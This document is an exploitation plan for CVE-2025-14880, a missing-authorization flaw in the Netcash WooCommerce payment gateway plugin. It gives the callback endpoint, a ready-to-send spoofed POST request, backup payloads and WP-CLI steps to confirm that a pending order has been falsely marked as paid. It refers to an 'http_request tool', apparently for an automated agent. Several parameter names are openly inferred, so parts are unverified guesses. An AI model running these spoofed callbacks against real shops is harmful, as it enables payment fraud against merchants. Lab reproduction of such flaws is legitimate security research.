Netcash WooCommerce Payment Gateway <= 4.1.3 - Missing Authorization to Unauthenticated Order Status Modification

This exploitation research plan focuses on CVE-2025-14880, a missing authorization vulnerability in the Netcash WooCommerce Payment Gateway plugin.

---

1. Vulnerability Summary

The Netcash WooCommerce Payment Gateway plugin (versions <= 4.1.3) contains a vulnerability where the handle_return_url function fails to perform sufficient authorization or authenticity checks. This function is designed to process callback notifications (Webhooks/IPNs) from the Netcash payment server. Because the function is accessible unauthenticated and lacks a signature or secret key verification, an attacker can spoof a successful payment notification to manipulate the status of any WooCommerce order.

2. Attack Vector Analysis

• Endpoint: The vulnerability is triggered via the WooCommerce API callback endpoint.
• URL Pattern: http://<target>/index.php?wc-api=WC_Gateway_Netcash (or a similar class-based slug, inferred from typical WooCommerce gateway implementations).
• Method: Likely POST or GET (Netcash typically uses POST for IPN/callbacks).
• Authentication: Unauthenticated (No WordPress login or nonce required).
• Preconditions:
  1. The Netcash Payment Gateway must be installed and active (though not necessarily fully configured with real API keys).
  2. At least one WooCommerce order must exist in the system (e.g., in 'pending' status).

3. Code Flow (Inferred)

1. Entry Point: The plugin registers a hook: add_action( 'woocommerce_api_wc_gateway_netcash', array( $this, 'handle_return_url' ) );.
2. Request Handling: When a request hits ?wc-api=wc_gateway_netcash, WordPress routes it to handle_return_url().
3. Data Extraction: The function extracts the Order ID from the request parameters (likely m_payment_id or order_id (inferred)).
4. Status Update: The function checks for a "success" indicator in the request (likely TransactionAccepted or status (inferred)).
5. Sink: Without verifying if the request originated from Netcash's servers or checking a shared secret, the code calls:
   • $order = wc_get_order( $order_id );
   • $order->payment_complete(); or $order->update_status( 'processing' );

4. Nonce Acquisition Strategy

This vulnerability resides in a WC_API callback. By design, WooCommerce API callbacks (used for external payment notifications) do not use WordPress nonces because the request originates from an external server (Netcash) that cannot possess a WordPress session-based nonce.

No nonce is required for this exploit.

5. Exploitation Strategy

Step 1: Discover the Order ID

You need a valid WooCommerce Order ID. In a test environment, this is easy. In a real-world scenario, Order IDs are often sequential.

Step 2: Construct the Malicious Callback

Based on Netcash (Pay Now) documentation and typical gateway logic, the callback payload likely requires an Order ID and a success flag.

• Action URL: http://<target>/index.php?wc-api=WC_Gateway_Netcash
• Payload (POST Body):

  m_payment_id=ORDER_ID&TransactionAccepted=true
  

  (Note: Parameters like m_payment_id and TransactionAccepted are common in Netcash integrations but should be verified by grepping the source for $_POST or $_GET inside the handle_return_url function.)

Step 3: Send the Exploit Request

Use the http_request tool to send the spoofed notification.

Request Template:

POST /index.php?wc-api=WC_Gateway_Netcash HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

m_payment_id=123&TransactionAccepted=true

6. Test Data Setup

Before running the exploit, ensure the environment is ready:

1. Install WooCommerce.
2. Install Netcash Plugin: Ensure netcash-pay-now-payment-gateway-for-woocommerce version 4.1.3 is active.
3. Create a Product:
   • wp post create --post_type=product --post_title="Test Product" --post_status=publish
4. Create a Pending Order:
   • Use the wp wc order create command:
   • wp wc order create --status=pending --customer_id=0 --line_items='[{"product_id": <ID>, "quantity": 1}]'
5. Note the Order ID returned by the creation command.

7. Expected Results

• The HTTP request should return a 200 OK (WooCommerce often returns 200 even if processing fails, but the order status is the key indicator).
• The targeted WooCommerce order's status should change from 'Pending Payment' to 'Processing' or 'Completed'.

8. Verification Steps

After sending the request, verify the order status using WP-CLI:

# Replace <ORDER_ID> with the ID of the order you targeted
wp wc order get <ORDER_ID> --fields=status --format=json

If the status is processing or completed, the exploit is successful.

9. Alternative Approaches

If m_payment_id or TransactionAccepted do not trigger the logic, perform the following code audits via CLI:

1. Identify the callback function:
   grep -r "handle_return_url" /var/www/html/wp-content/plugins/netcash-pay-now-payment-gateway-for-woocommerce/
2. Identify the parameters used in that function:
   grep -E "\$_POST| \$_GET| \$_REQUEST" [FILE_PATH_FROM_STEP_1]
3. Check for required status strings:
   Search for string comparisons like == 'ACCEPTED' or == '1' within the same function.

Backup Payload (Inferred variations):

• ?wc-api=WC_Gateway_Netcash&order_id=ORDER_ID&status=success
• ?wc-api=WC_Gateway_Netcash&Reference=ORDER_ID&Reason=Success